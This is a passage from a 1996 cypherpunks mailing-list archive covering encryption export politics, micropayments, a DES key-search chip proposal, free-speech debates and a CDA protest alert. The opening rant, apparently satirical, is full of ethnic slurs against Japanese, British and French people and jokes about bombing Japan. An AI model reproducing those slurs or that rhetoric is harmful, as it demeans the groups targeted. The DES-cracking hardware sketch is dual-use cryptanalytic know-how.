the arcane subculture of encryption technology." So let's go back to the
days before the virtual nuke. 

The father of encryption technology for most of us layman is Phil
Zimmerman, the author of PGP. Essentially, Phil's PGP (Pretty Good
Privacy) allows you to use encryption technology that the government would
have to spend too much time and too much money to bust every message you
sent. Phil's profit on PGP was zero. He offered it for free. The
government, always willing to let no good deed go unpunished, spent the
last 4 years threatening to put Phil in jail for exporting sensitive
technology. Phil didn't export a thing.  Someone - not Phil - loaded PGP
on the net, and lo and behold, the net being a global village, PGP toured
the village. After harassing Phil for four years, the gov't dropped its
case - in large part due to the financial and legal support Phil got from
those evil perverts called Netizens, Net Surfers, Hackers, Cypherpunks,
Electronic Freedom Foundation, Libertarians and other various forms of
traitorous electronic scum. I know his defense fund got a check from me
and my wife. 

Anyway, the government started feeling threatened by hordes of Pagans who
don't worship at the alter called Congress. So it offered us peanut-brains
the Clipper chip. Oops, make that KKKlipper chip. The idea behind the
KKKlipp-your-liberties-chip was that you could have all the privacy you
wanted by using the gov't chip, as long as the gov't had the "key" to
unlock your code. Duh, I don't know why all of us peanut brains didn't
line up to get that chip? What's the matter with Americans? Don't they
know a good deal when they see one. 

So, just to get even with us peanut-brains,
Bill-if-I-can't-look-up-your-skirt-
then-I'm-going-to-spy-on-your-motherboard-Clinton set up rules which
basically made it impossible for the US to compete in the "robust
encryption technologies [field], at a possible loss of $60 billion for US
companies."

Well, for some strange reason one of us peanut-brained Pagans, one of us
low life Hackers, one of us Netizen pond scum smelled buckies. His name is
Jim Bizdos. He's president of RSA. What RSA did was to hook up with some
of those funny speaking, slant-eyed, yellow people called Japanese
scuzzballs. Yup, Jim & the Japs came out with a "monster chipset capable
of scrambling voice and data real time with a 'key length' of up to 1024
bits." 

The operative term here is key length. The longer the key, the better the
encryption. US law says US companies can't export a key length greater
than 40 bits. Now here's the catch: Jim-unAmerican-greedy-guy and them
Thieving-low-down-Japs ain't exporting nutin'. They made the stuff in
Yellow- Peril Country. You know, Japan! Gosh, my fingers shook as wrote
that Jap word. 

Besides being attacked by the Japs, look out for the Limeys (Brits) and
the Frogs (The French). Dem folx is also developing encryption technology
that will put a child molester in every American home, a Republican in
every American trash can and a Democrat in every US toilet. 

Phil Zimmerman was the pioneer, but as Brock Meeks says, PGP is "tough to
use." The RSA chip set works in real time! It scrambles voice *and* data. 

15 low-down-degenerate-self-indulgent-uncaring-countries "have already
placed orders for these chips." Japanese law forbids building chips that
have what's called "an escrow function." An escrow function means the
gov't gets a key to your code.

In other words those damned Japs are attacking us again by making it a
legal requirement that your privacy and mine be protected. Damn, we should
have bombed on the whole country when we had the chance. Hey, tell you
what, after the FBI blows Justus to hell and back, let's send the Federal
Bloodletters and Incinerator-crew after the Yellow People. 

Yup, we don't no world trade. It's a threat to our pure KKKulture. World
trade is also a threat to jobs. If the Gestapo can't listen in on your
phone calls and decode your e-mail what are all those poor little FBI,
BATF, sheriffs, and local cops going to do? 

Comment: We're entering a period of world trade in which any government
that limits the liberties of its citizens will be punished in the market
place by competing governments. The fun has just begun.


Joe Zychik
Editor, The Zychik Chronicle

-------
Posted daily Mon-Fri after 3 pm PST at
http://www.pacificnet.net/~jzychik
To receive the ZC, free, contact:
jzychik@pacificnet.net






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Thu, 6 Jun 1996 19:45:43 +0800
To: cypherpunks@toad.com
Subject: Re: FOR WHOM THE BELL TOLLS
Message-ID: <v02140b00addc39dee500@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain



Duncan wrote:
> At 10:41 PM 6/4/96 -0700, Bruce Baugh wrote:
> >I think there's a non-trivial chance that this list could be shut down and
> >anyone who's made interested sounds in the idea brought in to assist the
> >police in their inquiries.
>
> Yeah and they busted Jack London for publishing
>"The Assassination Bureau, Ltd".[...]
>
> Advocating the general practice of killing one's opponents is as legal as
> church on a Sunday.  The War College (or is it the NDU these days) does it
> all the time.

As long as that person is not the President of the United States (at least
for U.S. citizens.)  This was the issue which initiated this thread, the
implied threat made by our favorite nutcase.

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 6 Jun 1996 18:28:10 +0800
To: cypherpunks@toad.com
Subject: Re: Fate of Ecash if RSA is cracked?
In-Reply-To: <m0uRIwy-0000AJC@ulf.mali.sub.org>
Message-ID: <6a33oD26w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Bodo_Moeller@public.uni-hamburg.de (Bodo Moeller) writes:
> Of course, no quantum computing device that you could run those
> "programs" on does exist. But as Gilles Brassard puts it, "In my
> opinion, the theoretical notion of feasible computation should be
> modelled on our understanding of the physical world, not on our
> technological abilities. After all, the classical Turing machine
> itself is an idealization that cannot be built in practice even not
> taking account of the unbounded tape: any real implmentation of a
> Turing machine would have nonzero probability of making a mistake.
> Does this discredit the model? I think not." [2]
...
> [2] Gilles Brassard, A Quantum Jump in Computer Science (in: Computer
>     Science Today (Springer-Verlag LNCS 1000), 1995, pp. 1-14)

Note that Turing et al did their analysis of what's computable and what's
not computable on Turing machines and their equivalents before computers
were physically built.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 6 Jun 1996 21:49:59 +0800
To: cypherpunks@toad.com
Subject: Re: Micropayments: myth?
Message-ID: <199606060708.AAA12312@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  7:57 PM 6/5/96 -0700, Nick Szabo wrote:
>Some electronic commerce projects promise dramatically lower transaction
>costs, so that we can achieve "micropayments", "microintermediation",
>and so forth.  Is this achievable?  
>
>Consider a feature fairly independent of the particular payment system: 
>the statement of charges.  Here lies a tradeoff here between completeness 
>and complexity.   On the one hand, merely summarizing charges creates 
>the opportunity for salami frauds, allowing widely distributed false or 
>exaggerated microcharges to go undetected.  Furthermore, parties reading 
>only the summaries get no feedback by which they can adjust their behavior
>to minimize costs.  On the other hand, a statement too complex to
>be easily read also allows fraud, error, and inefficient usage to 
>go unrecognized, because one or both parties cannot understand the 
>rationale for the charges in relation to the presumed agreement on
>terms of service and payment. 

This is, of course, an opportunity for agents (programmed, or two legged)
to use their superior knowledge of the service/technology/business to
optimize service for ordinary people.

>
>There seems to lie here a fundamental cognitive bottleneck, creating a
>limit to the granularity of billable transaction size whether electronic
>or physical.  One proposed solution to this has been "intelligent 
>agents".  But since these agents are programmed remotely, not by the 
>consumer, it is difficult for the consumer to determine whether the agent
>is acting the consumers' best interests, or in the best interests
>of the counterparty -- perhaps, necessarily, at least as difficult 
>as reading the corresponding full statement of charges.   By
>sleight of hand we may have merely transformed the language of 
>the transaction as it needs to be understood by the party, without
>reducing the complexity to be understood.  Furthermore, the user 
>interface to enable consumers to simply express their sophisticated 
>preferences to an agent is lacking, and may represent another fundamental 
>cognitive bottleneck.

I think that agent providers would gain reputations.  Many consumers might
trust an agent from Consumer's Union for example.  If there end up being
only a few types of agent, then I would expect to see an "arms race"
between charging systems and agents.  The providers would try to devise
charges which maximize their profit, while the agents would try to get the
best combination of service and cost for their users.  This race would be
similar to the situation we see in the telephone industry, with its
continuously changing "special long distance deals".

I assume any user interface will be in terms of the user's interests. 
Since these interests will change over time as the environment and user's
knowledge change, the UI will be a hard problem.  However, the UI will be
another factor in the user's agent selection process. 

>
>Telephone companies have found billing to be a major bottleneck.
>By some estimates, up to 50% of the costs of a long distance call
>are for billing, and this is on the order of a $100 billion per year
>market worldwide.  Internet providers have been moving to a flat fee in 
>order to minimize these costs, even though this creates the incentive for 
>network resource overusage.  

With the current low speed dialup connections, the savings on billing costs
are probably greater than the costs of bandwidth "over use".
>
>A micropayments system assumes a solution to the billing problem.
>If somebody could actually solve the this problem, rather 
>than merely claiming to have solved it via some mysterious
>means ("intelligent agents", et. al.), the savings would be 
>enormous even in existing businesses such as long distance and
>Internet service -- never mind all the new opportunities made
>possible by micropayments.  

Even a cash based payment system will have costs.  The lowest cost IP
payment system I know of, Norm Hardy's Digital Silk Road, has the cost of
increasing the complexity of the IP routers.  There is no free lunch here. 
Whether you call it accounting, billing, or micropayment; it is an
additional function which must be performed by a piece of code with
stringent performance requirements.

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Thu, 6 Jun 1996 21:43:05 +0800
To: gnu@toad.com
Subject: Triple-DES chip idea: built-in 1DES-cracker
Message-ID: <199606060750.AAA06399@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


It just occurred to me that companies which are designing Triple-DES
chips should spend a small chunk of their chip area and design time
on building in features for fast single-DES key search.

As in Matt Wiener's design, this would include logic to generate a
sequence of trial keys, and a circuit to evaluate the likelihood that
the trial key was "interesting" after examining the trial plaintext.
All of this logic would be on-chip and isolated from the pins of the
chip, so it could run at high speed without any impact on the rest of
the system.

Then, as these chips are deployed into consumer boards or
motherboards, a small amount of software plus the Internet will make
distributed DES cracking feasible.  Whenever the chip wasn't busy
doing some "real work" encoding data for the user, it would be
spinning its wheels cracking a DES key for fun or profit.

There are lots of interesting ways to build the comparison circuitry
to examine the trial plaintext.  The cheapest is to provide a single
64-bit register with the desired plaintext; that's what Matt's design
did.  Another cheap way would be to provide two 64-bit registers: a
mask and a value.  AND with the mask and compare to the value; it's
interesting if equal.  A second and/or third set of mask and value
registers (and another ciphertext register) would permit the test to
be across 16 or 24 bytes of ciphertext/plaintext rather than just 8.
This would be useful if e.g. your mask is only looking to see that the
high order bit of each byte is off in the ciphertext (indicating a
probability of ASCII text).  8-byte comparison would give you a
false-hit every 256 keys; 16-byte comparison would reduce that to one
every 65,536 keys.

Matt's chips froze when they got a match.  A FIFO on the comparison
output would let the chip continue to spin, looking for more matches,
before software got around to reading the results of a previous hit.
This would permit the chip to do DES-cracking in polled mode, without
using interrupts.  If the DES-cracking control registers were all
disjoint from the ordinary DES operational registers, the DES-cracking
could be initiated at any time, independent of the chip's encryption
functions, and could then be checked-up on periodically, again without
impacting the chip's normal functioning.  As an extreme example, it
could be started at system boot time, and checked only at system
shutdown for hits.

If you wanted to get truly fancy, the comparison should have eight
256-bit vectors, one per byte of plaintext.  Each vector is indexed by
the byte of plaintext, producing a single bit.  If it's 1, that byte
has an interesting value.  So if you set only the bits corresponding
to ASCII uppercase letters, then only a plaintext ASCII uppercase
letter is interesting.  So, the eight trial-plaintext bytes produce
eight bits, one from each vector.  Mash those together, and use this
8-bit value as an index to a ninth bit vector, which would let you
specify which combinations of "interesting" plaintext bytes are truly
interesting enough to stop the chip for.  E.g. if you insist that all
of the ciphertext bytes are ASCII uppercase letters, then all the
eight bit-vectors will be set up the same, and this ninth bit vector
will have a single 1-bit at index 11111111 (all bytes match).  If on
the other hand, any six out of the eight being uppercase is good
enough for you, you'd put a bunch of 1-bits into the ninth vector (one
for each possible way that six of the eight would match, such as
11010111 and 00111111 and 01111110).  In nine 256-bit vectors (less
than 300 bytes of on-chip storage), you could specify truly complex
and useful conditions like "First two bytes of plaintext equals
0x2C07, next three bytes are uppercase ASCII, next byte is a
don't-care, following byte is an ASCII digit".  This would be great
for matching up packet headers or partial plaintext, when looking for
the key to encrypted network traffic.  However, even these days,
adding 300 bytes of static storage to a 3DES chip for this kind of
ancillary function doesn't seem likely, until the market for
DES-cracker boxes matures.  (Each such box tends to consume large
numbers of DES chips, making them an attractive target market for a
chip vendor.)

But some of the simpler des-cracker assists I mentioned should be easy
to implement with only a few dozen bytes of static storage, some small
circuits and maybe one more address pin, making them suitable for
mass-market chips for PC's and such.

	John Gilmore, gnu@toad.com

PS:  Note that this feature would not affect the exportability of your
chip, which was already nil.  Design and build it overseas.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Intense <exalt@miworld.net>
Date: Thu, 6 Jun 1996 19:57:15 +0800
Subject: Re: On the Hill: Child Porn "Morphing"
In-Reply-To: <Pine.BSI.3.91.960605101735.23845C-100000@wichita.fn.net>
Message-ID: <Pine.LNX.3.91.960606012308.7402B-100000@invictor.miworld.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 5 Jun 1996, Bruce M. wrote:

> On Tue, 4 Jun 1996, Black Unicorn wrote:
> 
> > Hearings on the hill over the child pornographer horseman:
> > 
> > "Morphing" seems to be the latest buzzword for putting childrens faces on 
> > the bodies of adult models in sexually explicit poses and seems to have 
> > attracted enough attention to warrant congressional attention.
> > 
> > I'd like to see exactly how they word the proposed prohibitons.  What 
> > constitutes "child" when the face painted on is pure artistry?  Will we 
> > see a simple and strict prohibition over modifiying sexually explicit 
> > pictures to make them appear to be of younger models (whatever their 
> > apparent age may be)?  Will we see a subjective test as to what is "child 
> > looking" enough?
> 
> 	As far as I was aware, the manner of currently judging the age of 
> people in nude photographs consisted of a usually doctor administered 
> examination (of the picture) where the genitals and other age 
> characteristics of the BODY were taken into account.  I don't think a 
> person's face ever was, or ever should be, a factor.
> 
> > Silliness.  All silliness.
> 
> 	Very true.  Next there will be laws banning provocative pictures of
> adults dressed in child-like garb or acting out child-like sexual 
> fantasies (the infamous "spank me Daddy!).
> 
> 
>                     Bruce M. * brucem@feist.com
>         ~---------------------------------------------------~
>         "Knowledge enormous makes a god of me." -- John Keats
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Intense <exalt@miworld.net>
Date: Thu, 6 Jun 1996 19:37:05 +0800
To: cypherpunks@toad.com
Subject: Re: On the Hill: Child Porn "Morphing"
In-Reply-To: <Pine.BSI.3.91.960605101735.23845C-100000@wichita.fn.net>
Message-ID: <Pine.LNX.3.91.960606012347.7402C-100000@invictor.miworld.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 5 Jun 1996, Bruce M. wrote:

> On Tue, 4 Jun 1996, Black Unicorn wrote:
> 
> people in nude photographs consisted of a usually doctor administered 
> examination (of the picture) where the genitals and other age 
> characteristics of the BODY were taken into account.  I don't think a 
> person's face ever was, or ever should be, a factor.
> 
> > Silliness.  All silliness.
> 
> 	Very true.  Next there will be laws banning provocative pictures of
> adults dressed in child-like garb or acting out child-like sexual 
> fantasies (the infamous "spank me Daddy!).
> 

Urk anything that looks child-like, can be considered child porno.. 
again, it's a scarry thought that they govt. can prohibit someting that 
they deem to be "alike" in whatever way they feal....  :(


               *          <exalt@miworld.net>           *







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Fri, 7 Jun 1996 00:21:16 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: Terrorism Hysteria on the Net
In-Reply-To: <Pine.GUL.3.93.960605173029.13793A-100000@Networking.Stanford.EDU>
Message-ID: <Pine.SUN.3.91.960606030456.7919A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 5 Jun 1996, Rich Graves wrote:

> On Wed, 5 Jun 1996, John Young wrote:
> 
> > Today's USA has a pair of front page stories: 
> >  
> > They lay out the nightmares and the valiant TLA-daydreams to out-fund the
> > hackers and out-flummox the public. 
> >  
> >  
> > "You bring me a select group of hackers and within 90 days I'll bring this
> > country to its knees, " says Jim Settle, retired director of the FBI's
> > computer crime squad. 
> 
> He says that as if it were a bad thing...
> 
> > "The threat is there, it's very real," says CIA General Counsel Jeffrey
> > Smith. "If we have a Unabomber who decides to launch an attack with a PC
> > instead of a bomb, (there could be) real damage." 
> 
> Actually, he's probably right. If all the cypherpunks, say, turned "bad,"
> there'd be no government and no economy, because so many big systems are so
> insecure.

One could make the case that this would actually make the United States 
(if c'punks concentrated their attentions there) the most data secure 
country on the planet over time.


---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 6 Jun 1996 23:37:54 +0800
To: Syl Miniter <cypherpunks@toad.com
Subject: Re: is the list active??
Message-ID: <199606061023.DAA01890@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:36 PM 6/5/96 -0500, Syl Miniter wrote:
>I recently re-subscribed --several days ago and have not received any
>traffic???
>I am wondering if the list is still active as I checked and I am subscribednso
>I am sending this note to this list to test if anyone is out there


There are many dozen messages per day on CP.  


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 7 Jun 1996 03:52:25 +0800
To: Bruce Baugh <cypherpunks@toad.com
Subject: Re: FOR WHOM THE BELL TOLLS
Message-ID: <2.2.32.19960606105442.00a0ef34@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:55 PM 6/5/96 -0700, Bruce Baugh wrote:

>Do I really have to point out that London was writing the better part of a
>century ago, in a substantially different legal and cultural environment?
>(Heck, his socialism made more trouble for him than anything else.)

It was more restrictive in censorship terms than our current environment.

>>Advocating the general practice of killing one's opponents is as legal as
>>church on a Sunday.  The War College (or is it the NDU these days) does it
>>all the time.
>
>And they, of course, are The Government, who Protect Us from the Evil
>Terrorists. Ditto for the heroic BATF agents who only burn bad nasty
>terrorists, honest. And all the rest.

But I can advocate killing commies too.  It's like when this dumb California
(State) Senator advocated outlawing groups that advocate violence back in
1980 or so, I pointed out that the Public Schools and the Army were then
doomed since both of these groups "advocate violence."  Obviously the
California State Senate "advocates violence" as well in the enforcement of
laws.  

Military types even plan war against friends.  The War Department developed
Plan Red in the '20s for a war with the British Empire.  Called for an
amphibious assault on Halifax and a tank assault via Buffalo to secure
Toronto as part of a conquest of Canada.  

Note too that under the Nurenberg principles, I may be legally compelled (or
legally permitted) to kill my superior officers or government leaders if
they are committing war crimes.  And even the Sainted Ronald Reagan and his
government was convicted of war crimes by the International Court of Justice
for mining the harbor that serves Managua, Nicaragua.  (Air-sown mines.)
'War Crimes' are vague, meaningless, and ex post facto and thus justify
quite a lot of enforcement actions in theory (which is why Senator Robert A.
Taft opposed US participation in the Nurenberg trials.

"Yes, your honor, I'd like to pay taxes and everything but I'm afraid that I
might risk conviction at future war crimes trials of aiding and abetting the
criminal acts of my government." -- From 101 Flaky Anti Tax Arguments (which
may become a web site if I can teach myself forms.

>The rest of us (in the US) live in a country where the government can now
>pretty much declare anyone they like terrorists,

Just foreigners and such designation just affects fundraising.  (I've often
wondered why Hamas uses/used couriers for getting funds to Israel when
Israel has a great ATM network with international links.)

>and suspend habeus corpus on the flimsiest of grounds, 

The Anti Terrorism bill doesn't suspend Habeas Corpus it restricts mandatory
federal court review of state convictions to one try.  One can still submit
an unlimited number of Petitions for Writ of Habeas Corpus and any state or
federal court that wants to can grant one of them just as before.

>and use evidence against foreigners that doesn't have to be presented to
the accused,

In deportation proceedings.  And then they'll have to go to all the trouble
of turning around and coming back like the other million illegal entrants a
year.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Fri, 7 Jun 1996 10:34:13 +0800
To: cypherpunks@toad.com
Subject: NDcrypt available for Newtons
Message-ID: <Pine.3.89.9606060717.A8573-0100000@well>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Wed, 5 Jun 1996 22:49:26 -0700
From: Tom Collins <tom@newts.com>
To: declan@well.com
Subject: Revisiting an old subject...

** ENCRYPTION TOOL NOW NEWTON 2.0 SAVVY **

Geert Jadoul <76271.2121@CompuServe.COM> reports that he has finally
finished a Newton 2.0 savvy version of NDcrypt.

NDcrypt 2.0 Light is an improved version of NDcrypt v1.6.  It has become
a US$15 shareware utility with a trial period of 4 weeks.  After 4 weeks the
"Encrypt" and "UnReadable" buttons will disappear until you fill in the
registration code in the preferences window.  You will still be able
after 4 weeks to "Decrypt" notes or make them "Readable" again, so you
will not lose any data.

The name "NDcrypt 2.0 Light" also infers that Geert is working on a
NDcrypt 2.0 Pro version.  This version will have better incorporation of
NDcrypt in the system; overview and search functions; and viewing Notes
(decrypt a Note to view it but keep it encrypted in the Notes app).

NDcrypt 2.0 Light is available at <ftp://newton.uiowa.edu/submissions>
with the name "NDcry2Li.sit" and on Compuserve <GO NEWTON> under "NOS
2.0 ONLY".

      Tom Collins|Innovative Computer Solutions| <http://www.newts.com/>
    tom@newts.com| 1075 North Miller Rd., #142 |  <ftp://ftp.newts.com/>
pagetom@newts.com|  Scottsdale, Arizona 85257  |<phone://(602)970-1032/>







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 7 Jun 1996 12:28:28 +0800
To: cypherpunks@toad.com
Subject: ALERT: Court decision expected soon in free speech case; spreadthe word! (fwd)
Message-ID: <v03006f20addc6f66dd18@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Date: Wed, 5 Jun 1996 11:44:10 -0400
From: shabbir@vtw.org (Shabbir J. Safdar)
To: Multiple recipients of list <com-priv@lists.psi.com>
Subject: ALERT: Court decision expected soon in free speech case; spread
the word!

- ------
[Dear Friend-of-VTW,

 During our "Turn the Web Black campaign", you wrote us regarding that
 protest.  Because of the success of that campaign, we are asking you
 to participate again in another net-campaign to draw attention to the
 upcoming decision in the lawsuit to challenge the net censorship
 legislation.  This information is not widely available yet, and I would
 appreciate it if you did not redistribute this.

 Because you helped us out during the highly successful "Turn the Web
 Black" campaign, we are giving you advanced notice of this effort before
 we tell anyone else.

 -Shabbir J. Safdar, Voters Telecommunication Watch (www.vtw.org)]

========================================================================
__     _________        __     __   ____ ____ _____
\ \   / /_   _\ \      / /    / /  / ___|  _ \_   _|    Raise the roof
 \ \ / /  | |  \ \ /\ / /    / /  | |   | | | || |     for the Court's
  \ V /   | |   \ V  V /    / /   | |___| |_| || |     decision on net
   \_/    |_|    \_/\_/    /_/     \____|____/ |_|       free speech!
 Voters Telecommunications Watch / Center for Democracy and Technology

        JOIN TENS OF THOUSANDS OF NET USERS IN SPREADING THE WORD
           ABOUT THE FIRST RESULT OF THE FREE SPEECH LAWSUIT

                            June 5, 1996

          Redistribute (intact, please) only until June 28, 1996

- ------------------------------------------------------------------------
Table of contents
	News - A decision in the court case is near
	How to participate
	How will this campaign work?
	Press information on this event
	Background: what is the CDA?

- ------------------------------------------------------------------------
NEWS - A DECISION IN THE COURT CASE IS NEAR

The fate of the Internet and the future of the First Amendment in the
information age hang in the balance.  As early as this week, three federal
judges in Philadelphia are poised to issue a ruling in the law suit
challenging the Communications Decency Act (CDA), which restricts
constitutionally protected speech on the Internet.

Will the court rule that the CDA is unconstitutional? That the Internet is
a unique communications technology that deserves the same First Amendment
protections enjoyed by the print media? Or will the court side with Senator
Exon, conservative "pro-family" groups, and the Justice Department who have
argued that the government is the best judge of what material is
appropriate online.

Regardless of the outcome, the decision will have a profound impact on the
future of the Internet as a medium for free expression, education, and
commerce.

JOIN TENS OF THOUSANDS OF YOUR FELLOW NETIZENS IN ANNOUNCING THE DECISION

When the Communications Decency Act was signed into law by President
Clinton on February 8, 1996, the World Wide Web went black in protest.
When the decision in the historic legal challenge to the CDA is announced,
join tens of thousands of your fellow netizens in spreading the word on the
decision and its impact.

This campaign follows in the steps of the Turn the Web Black campaign,
which was a tremendous success.  Believe it or not, many Internet users
had only superficial knowledge about the proposed law and the enormous
press coverage and online awareness afterwards mobilized large numbers
of people.

In addition to the online campaign, there are currently rallies planned for
New York, press conferences from the CIEC and the ACLU, and a net campaign
to raise awareness to the decision and the effects it will have on free
speech.

The result of the first CDA decision is an extremely important milestone in
the fight for free speech online.  Will the net look more like print, or
more like Saturday morning television?

- ------------------------------------------------------------------------
INSTRUCTIONS ON HOW TO PARTICIPATE:

In anticipation of the decision, you can help keep your fellow Netizens
informed on the latest news and participate in a dramatic demonstration
when the decision is announced.

1. Add the following link *TODAY* in a prominent location on your web site:

	<a href="http://www.vtw.org/speech/">
        <img src="http://www.vtw.org/images/cda.gif"
        alt="Free speech court decision" align=top></a><br clear = all><br>

        A decision is near in the fight to overturn the Communications Decency
        Act. <br>Watch this image and follow the link for more information.

2. To let us know you have joined us, fill out the form at
	     http://www.vtw.org/speech/
   with your URL.  A list of participating will be displayed.

3. Attend the online press conference with lead CIEC (Citizens Internet
   Empowerment Coalition) attorney Bruce Ennis on HotWired.  More details
   are available on the WWW page.

- ------------------------------------------------------------------------
HOW WILL THIS CAMPAIGN WORK?

After you have added the link (above) to your page, an animated image
signifying that a decision in the case is expected soon will be
displayed on your site.  By clicking on that image, visitors to your
page can jump to a site containing the latest news and information on
the case.

As soon as a decision is announced, the image will be changed
automatically (the update will happen at our server - you will not have to
do anything), and Netizens throughout the entire global Internet will
immediately be aware of the result (win or lose).

By clicking on the updated image, visitors to your page will be able
to obtain the text of the decision, analysis, and other relevant
information.

Until the decision is announced, there will be information about upcoming
events and rallies on the VTW Free Speech page, http://www.vtw.org/speech/

- ------------------------------------------------------------------------
PRESS INFORMATION ON THIS EVENT

For more information on this event, including press inquiries, please
contact:

Jonah Seiger, Policy Analyst, Center For Democracy and Technology (CDT)
     <jseiger@cdt.org>  +1.202.637.9800

Shabbir Safdar, Online Representative, Voters Telecommunications Watch (VTW)
     <shabbir@vtw.org> +1.718.596.2851

- ------------------------------------------------------------------------
BACKGROUND: WHAT IS THE CDA?

The Communications Decency Act was passed as part of the Telecommunications
Reform bill in February 1996.  The law seeks to protect minors from
objectionable or sexually explicit material on the Internet by imposing
stiff criminal penalties on the "display" of "indecent" or "patently
offensive" material online.

Opponents to the new law argue that while well intentioned, the CDA fails
to account for the unique nature of the Internet, and that it will have a
far-reaching chilling effect on constitutionally protected speech online.
On a global, decentralized communications medium like the Internet, the
only effective and constitutional means of controlling access to
objectionable material is to rely on users and parents, not the government,
to decide what material is or is not appropriate.

Two lawsuits have been filed to challenge the constitutionality of the CDA
in a Philadelphia federal court. The cases have been consolidated and an
decision is expected in early June 1996.

The cases have been brought, respectively, by The Citizens Internet
Empowerment Coalition (CIEC), comprised of civil Liberties groups,
libraries, Internet Service Providers, Commercial Online Service Providers,
Newspaper, Magazine and Book Publishers, and over 45,000 individual
internet users, and a coalition of civil liberties groups, authors, and
others organized by the ACLU.

Detailed information on the legal challenges, as well as information about
the CDA, is available at the following web sites:

Legal Challenges To The CDA
- ----------------------------

*  The ACLU                     -   http://www.aclu.org/

*  The Citizens Internet
   Empowerment Coalition (CIEC)  -  http://www.cdt.org/ciec

Background Information On The CDA/Internet Censorship Issues
- ------------------------------------------------------------

* The ACLU                                     - http://www.aclu.org
* Center for Democracy and Technology (CDT)    - http://www.cdt.org
* Electronic Frontier Foundation (EFF)         - http://www.eff.org
* Electronic Privacy Information Center (EPIC) - http://www.epic.org
* Voters Telecommunications Watch (VTW)        - http://www.vtw.org

========================================================================


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Fri, 7 Jun 1996 11:37:02 +0800
To: cypherpunks@toad.com
Subject: Kook of the Month
Message-ID: <2.2.32.19960606160108.006c4794@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Cypherpunks don't just write code, they engage in petty vote fraud!

=-=-=-=-=

From: mlegare@wetware.com (M. Legare, etc.)
Newsgroups: alt.usenet.kooks,news.admin.net-abuse.misc
Subject: KotM Winners for May 1996 - SOMEONE'S miffed!
Date: 3 Jun 1996 16:05:12 GMT
Organization: Castle Wetware's Western Keep
Lines: 112
Message-ID: <4ov2fo$1mm@numbers.wetware.com>
NNTP-Posting-Host: news.wetware.com
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit

Well... it's June and here we go with the Winners for May - at least I'm 
more on-schedule than I was for April...

KOOK OF THE MONTH MAY 1996 - DMITRI VULIS (dlv@bwalk.dm.com)

In one of the most HOTLY contested KotM races in the history of the award
under my watch, Dmitri Vilus NARROWLY edged out vote taker Dave C (tale)
Lawrence in a race that was right down to the wire.

Let's recap:  Dmitri Vulis nominated tale for KotM because tale was involved
in a "conspiracy of thousands" to send out "forged rmgroup" messages for 
a newsgroup that Dmitri wanted to create.  Dmitri then posted evidence of 
somewhat dunious validity, and someone nominated Dmitri.

And the votes started pouring in.  Some from congress.gov, some from 
algebra.com, some from bwalk.dm.com... hundreds of votes.

Well, after an initial surge ahead by the tale backers, a DELUGE of email 
backing Vulis for KotM poured in, and, since I had to assume that ALL 
votes were valid (as Dmitri kept forging posts to misc.test in my name
to show his displeasure at my INSINUATING that he might have forged any 
votes), Dmitri won by a narrow 30 vote margin!

Vote Count:

Dmitri Vulis - 428 votes
David C Lawrence (tale) - 398 votes
Ed McClosky - 18 votes
Yehuda Silver - 9 votes
Bill Palmer - 4 votes
ellisd@netcom.com - 4 votes
Mr SAM - 2 votes
None of the Above - 3 votes
George Conklin - 1 vote
Rachel Ewing-Pace - 0 votes
smokindude@aol.com - 0 votes


Clueless Newbie of the Month for May 1996 - MARGE KRICK 

